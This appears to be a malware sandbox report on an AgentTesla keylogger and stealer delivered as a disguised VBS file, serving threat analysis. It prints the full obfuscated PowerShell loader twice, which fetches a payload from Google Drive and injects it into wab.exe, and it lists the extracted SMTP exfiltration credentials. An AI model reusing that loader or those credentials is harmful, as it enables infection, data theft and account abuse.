agenttesla | e89cc01f68abe8c3b986801052bd118be35c6dd01e3757ecfe80ed90acb2bff0

General

Target

ocrev ns.ordine 290520280324.vbs
Size

39KB
MD5

fa056beb38a88b12dbc668b3f154e767
SHA1

fac7b8db2c2d25253df4b363c4be4e6f53d36e5b
SHA256

e89cc01f68abe8c3b986801052bd118be35c6dd01e3757ecfe80ed90acb2bff0
SHA512

df44a0d080cef7bb783f8bf64876dca6e67afbb48d888c235914e33f70174cdd04907e250e7d7636fb18b209c5d0d5a27d752e9842aa1cbca730b818ee0ba00f
SSDEEP

768:u0agBtKWAZGc8NnKwiQoAMyCgnnDSR9mfJYAwYu3:BQqNnKwbmgnDSefJYADQ

Score

10^/10

agenttesla keylogger spyware stealer trojan

Malware Config

Extracted

Credentials

Protocol: smtp
Host:
mail.hostit.bg
Port:
587
Username:
office@kzu-bs.com
Password:
123kzu456

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.hostit.bg
Port:
587
Username:
office@kzu-bs.com
Password:
123kzu456
Email To:
andrewjames32211@gmail.com

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

4 drive.google.com
5 drive.google.com
9 drive.google.com
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

13 api.ipify.org
14 api.ipify.org
15 ip-api.com
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

2728 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

2768 powershell.exe
2728 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2768 set thread context of 2728 2768 powershell.exe wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid process

2368 powershell.exe
2768 powershell.exe
2768 powershell.exe
2728 wab.exe
2728 wab.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

2768 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 2368 powershell.exe
Token: SeDebugPrivilege 2768 powershell.exe
Token: SeDebugPrivilege 2728 wab.exe

flow	ioc
4	drive.google.com
5	drive.google.com
9	drive.google.com

flow	ioc
13	api.ipify.org
14	api.ipify.org
15	ip-api.com

pid	process
2728	wab.exe

pid	process
2768	powershell.exe
2728	wab.exe

description	pid	process	target process
PID 2768 set thread context of 2728	2768	powershell.exe	wab.exe

pid	process
2368	powershell.exe
2768	powershell.exe
2768	powershell.exe
2728	wab.exe
2728	wab.exe

pid	process
2768	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2368	powershell.exe
Token: SeDebugPrivilege	2768	powershell.exe
Token: SeDebugPrivilege	2728	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2756 wrote to memory of 2368	2756	WScript.exe	powershell.exe
PID 2756 wrote to memory of 2368	2756	WScript.exe	powershell.exe
PID 2756 wrote to memory of 2368	2756	WScript.exe	powershell.exe
PID 2368 wrote to memory of 2672	2368	powershell.exe	cmd.exe
PID 2368 wrote to memory of 2672	2368	powershell.exe	cmd.exe
PID 2368 wrote to memory of 2672	2368	powershell.exe	cmd.exe
PID 2368 wrote to memory of 2768	2368	powershell.exe	powershell.exe
PID 2368 wrote to memory of 2768	2368	powershell.exe	powershell.exe
PID 2368 wrote to memory of 2768	2368	powershell.exe	powershell.exe
PID 2368 wrote to memory of 2768	2368	powershell.exe	powershell.exe
PID 2768 wrote to memory of 2436	2768	powershell.exe	cmd.exe
PID 2768 wrote to memory of 2436	2768	powershell.exe	cmd.exe
PID 2768 wrote to memory of 2436	2768	powershell.exe	cmd.exe
PID 2768 wrote to memory of 2436	2768	powershell.exe	cmd.exe
PID 2768 wrote to memory of 2728	2768	powershell.exe	wab.exe
PID 2768 wrote to memory of 2728	2768	powershell.exe	wab.exe
PID 2768 wrote to memory of 2728	2768	powershell.exe	wab.exe
PID 2768 wrote to memory of 2728	2768	powershell.exe	wab.exe
PID 2768 wrote to memory of 2728	2768	powershell.exe	wab.exe
PID 2768 wrote to memory of 2728	2768	powershell.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ocrev ns.ordine 290520280324.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2756

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Balkanisering Skovjordbrrenes Squills #>;$Tolan=(cmd /c set /A 115^^0);Function Makron ([String]$Glitning62){$Flkksen=[char][int]$Tolan+'ubstring';$Seksualforbrydelsernterchoke=8;$Grisliest=Underfaktureringens($Glitning62);For($Seksualforbrydelser=7; $Seksualforbrydelser -lt $Grisliest; $Seksualforbrydelser+=$Seksualforbrydelsernterchoke){$Dissimilative=$Glitning62.$Flkksen.Invoke($Seksualforbrydelser, 1);$Heteromeran=$Heteromeran+$Dissimilative;}$Heteromeran;}function Brontosaur ($Afmelding){. ($trykknaptoner) ($Afmelding);}function Underfaktureringens ([String]$Flyvestationen){$Donorer=$Flyvestationen.Length-1;$Donorer;}$Achaemenidae=Makron 'LoricarTSul,hurrCoun,eraFrstegan frmn,vsE.samenfPuklen,eIron,our ZymogerSpunsigiunpreemnAntiarig Hulkor ';$nonapplicability=Makron 'fertilih Non.titPsaltettSan.sigpF rlgges Unmark:,orudbe/Theoso,/GerberadFeltop rQuarreliPast.urvInserateIp,pode.Viskendg DykkeroSinkerboKomponega ngueslResearceUndeci,.De ineacTranspooBjergtam Bundp,/Upan.shuFirlingcPrammes? embowkeMirrorixKystbanpTrm kenoCircumlrUnrelattSyndica= NonpardTr eskyoFordmmewPiecertnSmre stlSolvognoC,rasinaAnl gged Unfear&Prostiti SuperodUnissua=Corbina1Xe.omyrRbarrikaTSkovsvicMutualiDFllersr5 Ursulal SvovlabHove grB al ervFTeokratHMu onanxBilledr8apalitnpDef.nitsSkakterY,erisark ReunpanDia,onaD Futt rcSla.elsQLambast2RedimenmDummestwTilbag.AAngioc s Axioma1 CivileMWronskiZUddanneZFrit.me1U,pervayPre ankiBrnepda ';$trykknaptoner=Makron 'JobberiiBogtryke IndpakxWe.foot ';$Ibrndes=Makron 'unpower$P.eromag Tffel.l,sychoso Alkalib GravedaUnite il Unsavo:Tinges.Halkit,ao amnatirargyr stVedkommi Retouck Cyklo.uPriva.ilTu.indetFarv lfu Harborr Ta.negeAmorouslPygme,n Land.or= Araksh Dkna nkSForgivntIndskriaS,ebentrSlu,strtUltragr- SuperfBunctuosi .eterotSpecielsNeonre,TTrafikerA,derskaKar.issnwolmerss Et,ernfFortovsedisharmrAf,ladn Pol,ch-tranquiSEntu,iaoDigekrouflonellr Medic cPaintieeTa,tefe inte,s$,nserafnMemorizousyn.ign Tenontadetermip Tra.tap,freefjlbedrageiCo,terpcNovebora ForgasbTritanoi ngratlSta lvaiWhslehut KlinkeyCajoler T gugur-En,estyDH.ngerweIn.tastsMilie.st RaasiliafstemnnDokkemuaVerdenstAndengriFastlaaopokeroonlnning. Gramoch$Dys ropD HomoloeKodfodelDisgrunp Va dalrEthopo,o Pegas jFlukilyeSugep mku.yggeltLikvideeLhot.gorCantalon Reklame Squade ';Brontosaur (Makron ',ernban$AstianfgBrugernlCatal,no Contrab rereslaSp.reknl Pisten: CondylDAut,mobeFornentlOutperfpCimeliurArticovoMerenchjSpottaie AzoospkAnmodnitUniktame BeclasrDisembanTekstmaeLax.yci= Bedsta$m.ndskee Om krinKlirredvSk svrt:NedsnknaUnstuccpBengtedp Smir,idKi,kedaaFrdighetTartaraaR,goute ') ;Brontosaur (Makron 'Mali.ioI Kar.inmTechnicpVkstregol,getaarB handltPhenoxi-DisrobiMtrevreloKnirkeddPragtvru Skn eglFirebloe,xodist DrivhjuBGavne,eiS.earfitPhenylcsKo,dkriTKejserkrFo ledsa.escantnJvnbyrdshectol fDi antpeIchthyorBateman ') ;$Delprojekterne=$Delprojekterne+'\Cacidrosis.Pus' ;Brontosaur (Makron 'Chooseh$unnoosegForbrugl Cl ateoKrybberbGuyerssaPseudoslun.pray: RaadsmC UnspiroAeronomnAa nerec Empa.hu .kumrerFolkefos,onvoluuTonico.sAnomalo=Afbloms(DidstprTBrsspeke Afklens Th.atrtemitten- LerdonP Wrathia Triumvt Quadrih Teents Over.la$GjordedDOchlocreManipullPilleripAflvninrPropagao RenovajFerniseeGospelskSubje,tt Minkf.e.mrkelirEfterlinHavebrueRyn,era) Merist ') ;while (-not $Concursus) {Brontosaur (Makron 'goniophIBaandopf Quizzi So,rani(Evernes$PdagogeHBegodu oWeihoverArkadentBaalplaiApiece.k Kolo nuGe atinl TremaetAttrectu OversprbluffereVisitatlA.tenhi.VagtholJL,vsstioValt,rmbL,efangSUdmatrit Sex,loa CohogatSemimodeOverskr Aarskoe-p erygieAnklageqBr earb Nargilm$MultijuAMae nidcSkalpe.hKomlksvaDrner ce KloakemHammerkeMasc,tinSamvretiOratornd MaskinaTumbrele.razedn)Hylde.s skrueis{JgerstuSNonerrot elloesaDrjderbrEngrosstcol,oxu-SpringbSOrt gonlskarnkaeMeropodeRejensgpdivalen Afg.ett1Drfljen}Fis.neteVitrifalFin,ekasPersonleOrganot{ .horseSTeltholtJaketsraGro.tenr.alibratA.ompha-JagtlejSRetr,eul AuthoreTril.ineAgpaitip.uskers P.emeas1 rotche;SaarhelB ankvor make,hoKystb,nnalgorittColoniao BestiksrerigesaBuks baufodrodsr Agasti Napk.n$FicoskaIH andspb Oleo tr Soldesn Interrd SwabbeeLidiasasGardehu} ycledb ');Brontosaur (Makron 'Premitp$Nuppendgdatove,lja.batioBenzintbGeckinga.kstraplRecitat: DezaleCGril ino Unsp.nn SuppetcGrundl,u elefonrIncremesUnquencuInquirisObvolve=regange(R.ceptiTInitialeMazzardsEiner stpapirbi-Psam,omPpejlstoaRunaanttSkattebhClepsin Kanvase$ Aut maD Kursuse.dsvednlTrophodpStuelrdrExemplaoUn laspjT.lmatee GraphekAcroamatCronhame UdsgterLintelinP.ginereLngersc)Mukkert ') ;}Brontosaur (Makron 'Subseri$Otiatr,g Thereol Fr wnlouniformb GrandiaBjergarl Trngse:Ba.fodeGPerimetaUdbygdesb mbesto debarklStinkini terapieSygesikr .torsvyKommerc .happys=Spyttek BuzzerGHjemme eLjtnanttFabular-But,noiCLiniedioDrilybenLokalfot .uciabePastoranViv,ennt Shee,h Patrici$UnderwoDGamotroeBestyrel womanppfundamerLethargoBrudbjejExec treProfesskEric,ust M.gnifeVankeder egredinTilsidseKodere, ');Brontosaur (Makron 'Underin$Parb.ilgSautoirlAmbagioo GlycerbSengebaaabrogatlBombard:AntidotRPunktskrNenessulBerlineaD abssig E.uiartBelcher E,stas=S ackle Re res[MindstySUninterysnnernesUncathat tjeneseDamp.ammEnkeltp.Adia,heCTransitoBo,ishlnDragstevFestooneSemitenrKlarhjetfavuses]Arbejds: Progno:Fi tiveFSvind.erBribemooUnloppemR.gsenhBPassateaRu,turisSer,mineSalater6Sadlers4UndupliSCo pliat,hervefrBothriuiSamovarnHeartbrgTrrepla(Unimpre$Snurr,vGFarv.ndaWattseksOutsettoDisclail InjectiBeelolseCisternr UbemrkyRebon,i)Oenoli. ');Brontosaur (Makron 'Cooptin$Grangerg SentenlLymphadograt,nvbCourbela,oncettl Hetero:TaksttrP RenewaaForva.krEdi yineFroko,tnOutbawl Il,egal=Stung.e Stromat[RampikeSMindsteyMagth vsCiv.lpotNongramePoncanemTrentep.LdrepolT regnskeWi.netkxd.plobat Vi.kel.Konfyt E SnafflnMyopugicGenteknoQuer srdDia.oneiballernnT agtiggErrssva] ,ridev: Indfre: Enkem AStudentSRhagadeC EpistyI DisketI Jun,en.SojournG U,succe Fielbet SlagfjSandrogftUnintenrPrstindiMentholn DksblagTumlepl( Pedome$ nkoshRPropaner FilmbylAggregaaCoyotilg UnconstEftert )Haardfr ');Brontosaur (Makron 'Humuhum$Perikumg K,aksalDri husoSildigtbUtjenstaS,amanslUdk nto:KilolitT olatiliForhindl Af.rkktOrangervTiliseniRe,nskan sdvaneg JaithreB.stepurLar,ons=Plasm d$C ondroPPaleod a Squa,orPlexu.se tannitnParad.r.,rillensApsisseuGoopylubLus revsMatrixptAnyb.dirSalomoniData.asnDrivgasgxant ot(Waterwo3Inchoat5Mesorh,0,issabl7L fligh9,malhan4Ansv rs,Calandr3Shakeup2Spdbarn5Bidimen3Nipsgen7Tubuleu)Sixtyse ');Brontosaur $Tiltvinger;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2368

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
3⤵
PID:2672

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Balkanisering Skovjordbrrenes Squills #>;$Tolan=(cmd /c set /A 115^^0);Function Makron ([String]$Glitning62){$Flkksen=[char][int]$Tolan+'ubstring';$Seksualforbrydelsernterchoke=8;$Grisliest=Underfaktureringens($Glitning62);For($Seksualforbrydelser=7; $Seksualforbrydelser -lt $Grisliest; $Seksualforbrydelser+=$Seksualforbrydelsernterchoke){$Dissimilative=$Glitning62.$Flkksen.Invoke($Seksualforbrydelser, 1);$Heteromeran=$Heteromeran+$Dissimilative;}$Heteromeran;}function Brontosaur ($Afmelding){. ($trykknaptoner) ($Afmelding);}function Underfaktureringens ([String]$Flyvestationen){$Donorer=$Flyvestationen.Length-1;$Donorer;}$Achaemenidae=Makron 'LoricarTSul,hurrCoun,eraFrstegan frmn,vsE.samenfPuklen,eIron,our ZymogerSpunsigiunpreemnAntiarig Hulkor ';$nonapplicability=Makron 'fertilih Non.titPsaltettSan.sigpF rlgges Unmark:,orudbe/Theoso,/GerberadFeltop rQuarreliPast.urvInserateIp,pode.Viskendg DykkeroSinkerboKomponega ngueslResearceUndeci,.De ineacTranspooBjergtam Bundp,/Upan.shuFirlingcPrammes? embowkeMirrorixKystbanpTrm kenoCircumlrUnrelattSyndica= NonpardTr eskyoFordmmewPiecertnSmre stlSolvognoC,rasinaAnl gged Unfear&Prostiti SuperodUnissua=Corbina1Xe.omyrRbarrikaTSkovsvicMutualiDFllersr5 Ursulal SvovlabHove grB al ervFTeokratHMu onanxBilledr8apalitnpDef.nitsSkakterY,erisark ReunpanDia,onaD Futt rcSla.elsQLambast2RedimenmDummestwTilbag.AAngioc s Axioma1 CivileMWronskiZUddanneZFrit.me1U,pervayPre ankiBrnepda ';$trykknaptoner=Makron 'JobberiiBogtryke IndpakxWe.foot ';$Ibrndes=Makron 'unpower$P.eromag Tffel.l,sychoso Alkalib GravedaUnite il Unsavo:Tinges.Halkit,ao amnatirargyr stVedkommi Retouck Cyklo.uPriva.ilTu.indetFarv lfu Harborr Ta.negeAmorouslPygme,n Land.or= Araksh Dkna nkSForgivntIndskriaS,ebentrSlu,strtUltragr- SuperfBunctuosi .eterotSpecielsNeonre,TTrafikerA,derskaKar.issnwolmerss Et,ernfFortovsedisharmrAf,ladn Pol,ch-tranquiSEntu,iaoDigekrouflonellr Medic cPaintieeTa,tefe inte,s$,nserafnMemorizousyn.ign Tenontadetermip Tra.tap,freefjlbedrageiCo,terpcNovebora ForgasbTritanoi ngratlSta lvaiWhslehut KlinkeyCajoler T gugur-En,estyDH.ngerweIn.tastsMilie.st RaasiliafstemnnDokkemuaVerdenstAndengriFastlaaopokeroonlnning. Gramoch$Dys ropD HomoloeKodfodelDisgrunp Va dalrEthopo,o Pegas jFlukilyeSugep mku.yggeltLikvideeLhot.gorCantalon Reklame Squade ';Brontosaur (Makron ',ernban$AstianfgBrugernlCatal,no Contrab rereslaSp.reknl Pisten: CondylDAut,mobeFornentlOutperfpCimeliurArticovoMerenchjSpottaie AzoospkAnmodnitUniktame BeclasrDisembanTekstmaeLax.yci= Bedsta$m.ndskee Om krinKlirredvSk svrt:NedsnknaUnstuccpBengtedp Smir,idKi,kedaaFrdighetTartaraaR,goute ') ;Brontosaur (Makron 'Mali.ioI Kar.inmTechnicpVkstregol,getaarB handltPhenoxi-DisrobiMtrevreloKnirkeddPragtvru Skn eglFirebloe,xodist DrivhjuBGavne,eiS.earfitPhenylcsKo,dkriTKejserkrFo ledsa.escantnJvnbyrdshectol fDi antpeIchthyorBateman ') ;$Delprojekterne=$Delprojekterne+'\Cacidrosis.Pus' ;Brontosaur (Makron 'Chooseh$unnoosegForbrugl Cl ateoKrybberbGuyerssaPseudoslun.pray: RaadsmC UnspiroAeronomnAa nerec Empa.hu .kumrerFolkefos,onvoluuTonico.sAnomalo=Afbloms(DidstprTBrsspeke Afklens Th.atrtemitten- LerdonP Wrathia Triumvt Quadrih Teents Over.la$GjordedDOchlocreManipullPilleripAflvninrPropagao RenovajFerniseeGospelskSubje,tt Minkf.e.mrkelirEfterlinHavebrueRyn,era) Merist ') ;while (-not $Concursus) {Brontosaur (Makron 'goniophIBaandopf Quizzi So,rani(Evernes$PdagogeHBegodu oWeihoverArkadentBaalplaiApiece.k Kolo nuGe atinl TremaetAttrectu OversprbluffereVisitatlA.tenhi.VagtholJL,vsstioValt,rmbL,efangSUdmatrit Sex,loa CohogatSemimodeOverskr Aarskoe-p erygieAnklageqBr earb Nargilm$MultijuAMae nidcSkalpe.hKomlksvaDrner ce KloakemHammerkeMasc,tinSamvretiOratornd MaskinaTumbrele.razedn)Hylde.s skrueis{JgerstuSNonerrot elloesaDrjderbrEngrosstcol,oxu-SpringbSOrt gonlskarnkaeMeropodeRejensgpdivalen Afg.ett1Drfljen}Fis.neteVitrifalFin,ekasPersonleOrganot{ .horseSTeltholtJaketsraGro.tenr.alibratA.ompha-JagtlejSRetr,eul AuthoreTril.ineAgpaitip.uskers P.emeas1 rotche;SaarhelB ankvor make,hoKystb,nnalgorittColoniao BestiksrerigesaBuks baufodrodsr Agasti Napk.n$FicoskaIH andspb Oleo tr Soldesn Interrd SwabbeeLidiasasGardehu} ycledb ');Brontosaur (Makron 'Premitp$Nuppendgdatove,lja.batioBenzintbGeckinga.kstraplRecitat: DezaleCGril ino Unsp.nn SuppetcGrundl,u elefonrIncremesUnquencuInquirisObvolve=regange(R.ceptiTInitialeMazzardsEiner stpapirbi-Psam,omPpejlstoaRunaanttSkattebhClepsin Kanvase$ Aut maD Kursuse.dsvednlTrophodpStuelrdrExemplaoUn laspjT.lmatee GraphekAcroamatCronhame UdsgterLintelinP.ginereLngersc)Mukkert ') ;}Brontosaur (Makron 'Subseri$Otiatr,g Thereol Fr wnlouniformb GrandiaBjergarl Trngse:Ba.fodeGPerimetaUdbygdesb mbesto debarklStinkini terapieSygesikr .torsvyKommerc .happys=Spyttek BuzzerGHjemme eLjtnanttFabular-But,noiCLiniedioDrilybenLokalfot .uciabePastoranViv,ennt Shee,h Patrici$UnderwoDGamotroeBestyrel womanppfundamerLethargoBrudbjejExec treProfesskEric,ust M.gnifeVankeder egredinTilsidseKodere, ');Brontosaur (Makron 'Underin$Parb.ilgSautoirlAmbagioo GlycerbSengebaaabrogatlBombard:AntidotRPunktskrNenessulBerlineaD abssig E.uiartBelcher E,stas=S ackle Re res[MindstySUninterysnnernesUncathat tjeneseDamp.ammEnkeltp.Adia,heCTransitoBo,ishlnDragstevFestooneSemitenrKlarhjetfavuses]Arbejds: Progno:Fi tiveFSvind.erBribemooUnloppemR.gsenhBPassateaRu,turisSer,mineSalater6Sadlers4UndupliSCo pliat,hervefrBothriuiSamovarnHeartbrgTrrepla(Unimpre$Snurr,vGFarv.ndaWattseksOutsettoDisclail InjectiBeelolseCisternr UbemrkyRebon,i)Oenoli. ');Brontosaur (Makron 'Cooptin$Grangerg SentenlLymphadograt,nvbCourbela,oncettl Hetero:TaksttrP RenewaaForva.krEdi yineFroko,tnOutbawl Il,egal=Stung.e Stromat[RampikeSMindsteyMagth vsCiv.lpotNongramePoncanemTrentep.LdrepolT regnskeWi.netkxd.plobat Vi.kel.Konfyt E SnafflnMyopugicGenteknoQuer srdDia.oneiballernnT agtiggErrssva] ,ridev: Indfre: Enkem AStudentSRhagadeC EpistyI DisketI Jun,en.SojournG U,succe Fielbet SlagfjSandrogftUnintenrPrstindiMentholn DksblagTumlepl( Pedome$ nkoshRPropaner FilmbylAggregaaCoyotilg UnconstEftert )Haardfr ');Brontosaur (Makron 'Humuhum$Perikumg K,aksalDri husoSildigtbUtjenstaS,amanslUdk nto:KilolitT olatiliForhindl Af.rkktOrangervTiliseniRe,nskan sdvaneg JaithreB.stepurLar,ons=Plasm d$C ondroPPaleod a Squa,orPlexu.se tannitnParad.r.,rillensApsisseuGoopylubLus revsMatrixptAnyb.dirSalomoniData.asnDrivgasgxant ot(Waterwo3Inchoat5Mesorh,0,issabl7L fligh9,malhan4Ansv rs,Calandr3Shakeup2Spdbarn5Bidimen3Nipsgen7Tubuleu)Sixtyse ');Brontosaur $Tiltvinger;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2768

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
4⤵
PID:2436

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2728

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
24248cd09ac9ba6f28cade88e1db1949

SHA1
27225123d441ab2c93c45b466027a52336f0f3b7

SHA256
10614abf0d3ae812aa3cd26a4c4c1c9e520f917308fe65464f39efa5816c2502

SHA512
9e93f5c1939cb0fb687fea7d4af12925847f778136bf87b035b83bd9d266f1a15f9f5835246abef7581b8ac4adc6eff956b72bbabbf9646ff1c0efad2e45920e

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabB01D.tmp
Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AE4U6I4WWL0EKLRICM8Z.temp
Filesize
7KB

MD5
e3b2a7e5884eac1bc65e25192fd8e244

SHA1
ad1100ca7a57c9fb21a2b1d59e7aac2f6f9260e0

SHA256
de295c586f4f0619c7b44e01a275c6f6505a0e53790b69f0a59575f20f051f23

SHA512
be94b5c6f83f225ebf80ac7c8988c1d0f45400a8afbcbf457d19ef6b445a2fc7f1103b3c94968c7befda9da99a91f3a0bfd144c06c83c2bfb81be571e578a29f

Download Submit
memory/2368-33-0x00000000028E0000-0x0000000002960000-memory.dmp

Filesize
512KB

Download
memory/2368-8-0x00000000028E0000-0x0000000002960000-memory.dmp

Filesize
512KB

Download
memory/2368-9-0x00000000028E0000-0x0000000002960000-memory.dmp

Filesize
512KB

Download
memory/2368-10-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Filesize
9.6MB

Download
memory/2368-11-0x00000000028E0000-0x0000000002960000-memory.dmp

Filesize
512KB

Download
memory/2368-12-0x0000000002D90000-0x0000000002DB2000-memory.dmp

Filesize
136KB

Download
memory/2368-13-0x0000000002CC0000-0x0000000002CD2000-memory.dmp

Filesize
72KB

Download
memory/2368-67-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Filesize
9.6MB

Download
memory/2368-4-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

Filesize
2.9MB

Download
memory/2368-7-0x00000000028E0000-0x0000000002960000-memory.dmp

Filesize
512KB

Download
memory/2368-36-0x00000000028E0000-0x0000000002960000-memory.dmp

Filesize
512KB

Download
memory/2368-6-0x0000000002B60000-0x0000000002B68000-memory.dmp

Filesize
32KB

Download
memory/2368-29-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Filesize
9.6MB

Download
memory/2368-5-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Filesize
9.6MB

Download
memory/2368-31-0x00000000028E0000-0x0000000002960000-memory.dmp

Filesize
512KB

Download
memory/2368-32-0x00000000028E0000-0x0000000002960000-memory.dmp

Filesize
512KB

Download
memory/2728-74-0x00000000731D0000-0x00000000738BE000-memory.dmp

Filesize
6.9MB

Download
memory/2728-43-0x0000000077B36000-0x0000000077B37000-memory.dmp

Filesize
4KB

Download
memory/2728-75-0x00000000223B0000-0x00000000223F0000-memory.dmp

Filesize
256KB

Download
memory/2728-42-0x0000000077910000-0x0000000077AB9000-memory.dmp

Filesize
1.7MB

Download
memory/2728-72-0x0000000077910000-0x0000000077AB9000-memory.dmp

Filesize
1.7MB

Download
memory/2728-70-0x00000000223B0000-0x00000000223F0000-memory.dmp

Filesize
256KB

Download
memory/2728-69-0x00000000731D0000-0x00000000738BE000-memory.dmp

Filesize
6.9MB

Download
memory/2728-68-0x0000000001040000-0x0000000001082000-memory.dmp

Filesize
264KB

Download
memory/2728-65-0x0000000001040000-0x00000000020A2000-memory.dmp

Filesize
16.4MB

Download
memory/2728-44-0x0000000077B00000-0x0000000077BD6000-memory.dmp

Filesize
856KB

Download
memory/2768-38-0x0000000002AA0000-0x0000000002AE0000-memory.dmp

Filesize
256KB

Download
memory/2768-17-0x0000000002AA0000-0x0000000002AE0000-memory.dmp

Filesize
256KB

Download
memory/2768-16-0x0000000073A00000-0x0000000073FAB000-memory.dmp

Filesize
5.7MB

Download
memory/2768-18-0x0000000073A00000-0x0000000073FAB000-memory.dmp

Filesize
5.7MB

Download
memory/2768-34-0x0000000005730000-0x0000000005731000-memory.dmp

Filesize
4KB

Download
memory/2768-40-0x0000000077B00000-0x0000000077BD6000-memory.dmp

Filesize
856KB

Download
memory/2768-30-0x0000000002AA0000-0x0000000002AE0000-memory.dmp

Filesize
256KB

Download
memory/2768-39-0x0000000077910000-0x0000000077AB9000-memory.dmp

Filesize
1.7MB

Download
memory/2768-37-0x0000000073A00000-0x0000000073FAB000-memory.dmp

Filesize
5.7MB

Download
memory/2768-35-0x0000000006C20000-0x000000000B573000-memory.dmp

Filesize
73.3MB

Download
memory/2768-19-0x0000000002AA0000-0x0000000002AE0000-memory.dmp

Filesize
256KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads